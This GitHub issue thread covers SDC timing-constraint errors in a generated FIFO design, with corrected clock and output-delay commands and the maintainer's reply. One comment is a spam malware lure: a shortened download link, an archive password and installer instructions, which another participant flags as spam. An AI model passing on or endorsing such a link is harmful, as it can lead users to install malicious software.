### ISSUE TITLE
Multiple SDC errors

### ISSUE THREAD

**Issue by maliberty** [rocksavagetech/dynamicfifo#4]
In your output it shows that you have SDC problems: https://github.com/rocksavagetech/dynamicfifo/blob/b98197e5c480c41596a5ccd8588a999f8d768359/generated/synTestCases/large_false_64_256/timing.rpt#L3

```
Warning: There are 148 input ports missing set_input_delay.
Warning: There are 150 output ports missing set_output_delay.
Warning: There are 16409 unclocked register/latch pins.
Warning: There are 16559 unconstrained endpoints.
```

The problem is at https://github.com/rocksavagetech/dynamicfifo/blob/b98197e5c480c41596a5ccd8588a999f8d768359/src/main/scala/DynamicFifo.scala#L170
This creates a virtual clock that is not attached to anything.  You can just do
```
create_clock -period $period -waveform {0 $fallingEdge} clock
```
to fix it.  (The name of the clock, if unspecified, comes from the first pin).

A second issue is that you provide no constraints for io_ramWriteAddress and io_ramReadAddress ports.  You need to add
```
    set_output_delay -clock clock $outputDelay {io_ramWriteAddress }
    set_output_delay -clock clock $outputDelay {io_ramReadAddress }
```
A minor note, `  val period      = 5.000 // ns` is dependent on the PDK being used.  Nangate45 uses ns but others may use ps.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by maliberty** [comment]
(note the above comment is spam and should not be downloaded).

**Comment by twsavage59** [comment]
Thanks for spotting this!  As you noted there were multiple issues:

1. Clock specification was incorrect.
2. Missing timing data for the external RAM address ports.
3. But main problem was related to the STA script calling check_setup before the SDC values were sourced.

Also good point about PDK timescales. I can't think of a clever approach to incorporate that nicely into the code generation use model. For now, users have to modify the generated SDC accordingly. But having a template to start with is not a bad start. It's better than most IP providers provide today.
